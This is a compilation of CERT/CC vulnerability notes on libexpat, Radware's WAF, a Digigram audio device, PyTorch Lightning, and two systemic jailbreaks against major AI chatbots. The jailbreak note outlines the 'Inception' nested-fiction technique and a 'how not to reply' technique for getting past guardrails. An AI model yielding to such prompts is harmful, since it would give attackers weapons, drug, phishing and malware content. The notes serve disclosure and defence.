-
VU#760160: libexpat library is vulnerable to DoS attacks through stack overflow
Overview
A stack overflow vulnerability has been discovered within the libexpat open source library. When parsing XML documents with deeply nested entity references, libexpat can recurse indefinitely. This can result in exhaustion of stack space and a crash. An attacker can weaponize this to either perform denial of service (DoS) attacks or memory corruption attacks, based on the libexpat environment and library usage.
Description
libexpat is an Open Source XML parsing library. It is a stream oriented XML parsing library written in the C programming language. It can be used in particular with large files difficult for processing in RAM. A vulnerability has been discovered, tracked as CVE-2024-8176. The vulnerability description can be observed below.
CVE-2024-8176
A stack overflow vulnerability exists in the libexpat library due to the way it handles recursive entity expansion in XML documents. When parsing an XML document with deeply nested entity references, libexpat can be forced to recurse indefinitely, exhausting the stack space and causing a crash. This issue could lead to denial of service (DoS) or, in some cases, exploitable memory corruption, depending on the environment and library usage.
Impact
An attacker with access to software that uses libexpat could provide a XML document to the program and cause a DoS attack or memory corruption attack. libexpat is used in a variety of different software, and by various companies.
Solution
A patch for the vulnerability has been provided in version 2.7.0 of libexpat. Groups that use libexpat can verify their patch using the POCs provided here: https://github.com/libexpat/libexpat/issues/893#payload_generators
Acknowledgements
This vulnerability was reported to us by the maintainer of the project, Sebastian Pipping, to increase awareness. The vulnerability was originally discovered by Jann Horn of Googles Project Zero. Vendors who wish to join the discussion within VINCE can do so here: https://www.kb.cert.org/vince/. This document was written by Christopher Cullen.
-
VU#722229: Radware Cloud Web Application Firewall Vulnerable to Filter Bypass
Overview
The Radware Cloud Web Application Firewall is vulnerable to filter bypass by multiple means. The first is via specially crafted HTTP request and the second being insufficient validation of user-supplied input when processing a special character. An attacker with knowledge of these vulnerabilities can perform additional attacks without interference from the firewall.
Description
The Radware Cloud Web Application Firewall can be bypassed by means of a crafted HTTP request. If random data is included in the HTTP request body with a HTTP GET method, WAF protections may be bypassed. It should be noted that this evasion is only possible for those requests that use the HTTP GET method.
Another way the Radware Cloud WAF can be bypassed is if an attacker adds a special character to the request. The firewall fails to filter these requests and allows for various payloads to reach the underlying web application.
Impact
An attacker with knowledge of these vulnerabilities can bypass filtering. This allows malicious inputs to reach the underlying web application.
Solution
The vulnerabilities appear to be fixed, however Radware has not acknowledged the reporter's findings when they were initially disclosed.
Acknowledgements
Thanks to Oriol Gegundez for reporting this issue. This document was written by Kevin Stephens and Ben Koo.
-
VU#360686: Digigram PYKO-OUT audio-over-IP (AoIP) does not require a password by default
Overview
Digigrams PYKO-OUT audio-over-IP (AoIP) product is used for audio decoding and intended for various uses such as paging, background music, live announcements and others. It has hardware compatibility with two analog mono outputs and a USB port for storing local playlists. The product does not require a password by default, and when opened to the Internet, can allow attackers access to the device, where they can then pivot to attacking adjacent connected devices or compromise the device's functionality.
Description
Digigram is an audio-based hardware and software vendor, providing various products including sound cards, AoIP gateways, and speaker-related support software. Digigram sells a PYKO-OUT audio-over-IP product that is used for audio decoding and intended for various uses such as paging, background music, and live announcements.
A vulnerability has been discovered within the web-server component of the PYKO-OUT AoIP, where the default configuration does not require any login information or password. This web server spawns on 192.168.0.100 by default. The lack of log-in credentials allows any attacker who discovers the vulnerable IP address of the device to connect and manipulate it, without any authentication or authorization.
An attacker who gains access to the device can access its configuration, control audio outputs and inputs, and potentially pivot to other connected devices, whether this be through network connections, or by placing malicious files in a connected USB device.
Impact
An attacker with access to a vulnerable device can access the devices configuration, control audio-over-IP data streams managed by the device, and pivot to other network and physical connected devices, such as through a connected USB thumb drive.
Solution
Digigram has marked this product as EOL and will not be providing a patch to change the default configuration. Users can alter the password settings within the web server UI and force attempted connections to provide a password. Additionally, the product is no longer being sold by Digigram.
Acknowledgements
Thanks to the reporter, Souvik Kandar. Additional thanks to CERT-FR. This document was written by Christopher Cullen.
-
VU#667211: Various GPT services are vulnerable to two systemic jailbreaks, allows for bypass of safety guardrails
Overview
Two systemic jailbreaks, affecting a number of generative AI services, were discovered. These jailbreaks can result in the bypass of safety protocols and allow an attacker to instruct the corresponding LLM to provide illicit or dangerous content. The first jailbreak, called “Inception,” is facilitated through prompting the AI to imagine a fictitious scenario. The scenario can then be adapted to another one, wherein the AI will act as though it does not have safety guardrails. The second jailbreak is facilitated through requesting the AI for information on how not to reply to a specific request.
Both jailbreaks, when provided to multiple AI models, will result in a safety guardrail bypass with almost the exact same syntax. This indicates a systemic weakness within many popular AI systems.
Description
Two systemic jailbreaks, affecting several generative AI services, have been discovered. These jailbreaks, when performed against AI services with the exact same syntax, result in a bypass of safety guardrails on affected systems.
The first jailbreak, facilitated through prompting the AI to imagine a fictitious scenario, can then be adapted to a second scenario within the first one. Continued prompting to the AI within the second scenarios context can result in bypass of safety guardrails and allow the generation of malicious content. This jailbreak, named “Inception” by the reporter, affects the following vendors:
- ChatGPT (OpenAI)
- Claude (Anthropic)
-
- DeepSeek
- Gemini (Google)
- Grok (Twitter/X)
- MetaAI (FaceBook)
- MistralAI
The second jailbreak is facilitated through prompting the AI to answer a question with how it should not reply within a certain context. The AI can then be further prompted with requests to respond as normal, and the attacker can then pivot back and forth between illicit questions that bypass safety guardrails and normal prompts. This jailbreak affects the following vendors:
- ChatGPT
- Claude
-
- DeepSeek
- Gemini
- Grok
- MistralAI
Impact
These jailbreaks, while of low severity on their own, bypass the security and safety guidelines of all affected AI services, allowing an attacker to abuse them for instructions to create content on various illicit topics, such as controlled substances, weapons, phishing emails, and malware code generation.
A motivated threat actor could exploit this jailbreak to achieve a variety of malicious actions. The systemic nature of these jailbreaks heightens the risk of such an attack. Additionally, the usage of legitimate services such as those affected by this jailbreak can function as a proxy, hiding a threat actors malicious activity.
Solution
Various affected vendors have provided statements on the issue and have altered services to prevent the jailbreak.
Acknowledgements
Thanks to the reporters, David Kuzsmar, who reported the first jailbreak, and Jacob Liddle, who reported the second jailbreak. This document was written by Christopher Cullen.
-
VU#252619: Multiple deserialization vulnerabilities in PyTorch Lightning 2.4.0 and earlier versions
Overview
PyTorch Lightning versions 2.4.0 and earlier do not use any verification mechanisms to ensure that model files are safe to load before loading them. Users of PyTorch Lightning should use caution when loading models from unknown or unmanaged sources.
Description
PyTorch Lightning, a high-level framework built on top of PyTorch, is designed to streamline deep learning model training, scaling, and deployment. PyTorch Lightning is widely used in AI research and production environments, often integrating with various cloud and distributed computing platforms to manage large-scale machine learning workloads.
PyTorch Lightning contains multiple vulnerabilities related to the deserialization of untrusted data (CWE-502). These vulnerabilities arise from the unsafe use of torch.load()
, which is used to deserialize model checkpoints, configurations, and sometimes metadata. While torch.load()
provides an optional weights_only=True
parameter to mitigate the risks of loading arbitrary code, PyTorch Lightning does not require or enforce this safeguard as a principal security requirement for the product.
Kasimir Schulz of HiddenLayer identified and reported the following five vulnerabilities:
- The
DeepSpeed
integration in PyTorch Lightning loads optimizer states and model checkpoints without enforcing safe deserialization practices. It does not validate the integrity or origin of serialized data before passing it to torch.load()
, allowing deserialization of arbitrary objects.
- The
PickleSerializer
class directly utilizes Python’s pickle module to handle data serialization and deserialization. Since pickle inherently allows execution of embedded code during deserialization, any untrusted or manipulated input processed by this class can introduce security risks.
- The
_load_distributed_checkpoint
component is responsible for handling distributed training checkpoints. It processes model state data across multiple nodes, but it does not include safeguards to verify or restrict the content being deserialized.
- The
_lazy_load
function is designed to defer loading of model components for efficiency. However, it does not enforce security controls on the serialized input, allowing for the potential deserialization of unverified objects.
- The
Cloud_IO
module facilitates storage and retrieval of model files from local and remote sources. It provides multiple deserialization pathways, such as handling files from disk, from remote servers, and from in-memory byte streams, without applying constraints on how the serialized data is interpreted.
Impact
A user could unknowingly load a malicious file from local or remote locations containing embedded code that executes within the system’s context, potentially leading to full system compromise.
Solution
To reduce the risk of deserialization-based vulnerabilities in PyTorch Lightning, users and organizations can implement the following mitigations at the system and operational levels:
- Verify that files to be loaded are from trusted sources and with valid signatures;
- Use Sandbox environments to prevent abuse of arbitrary commands when untrusted models or files are being used or tested;
- Perform static and dynamic analysis of files to be loaded to verify that the ensuing operations will remain restricted to the data processing needs of the environment;
- Disable unnecessary deserialization features by ensuring that
torch.load()
is always used with weights_only = True
when the files to be loaded are model weights.
We have not received a statement from Lightning AI at this time. Please check the Vendor Information section for updates as they become available.
Acknowledgements
Thanks to the reporter, Kasimir Schulz [kschulz@hiddenlayer.com] from HiddenLayer. Thanks to Matt Churilla for verifying the vulnerabilities. This document was written by Renae Metcalf, Vijay Sarvepalli, and Eric Hatleback.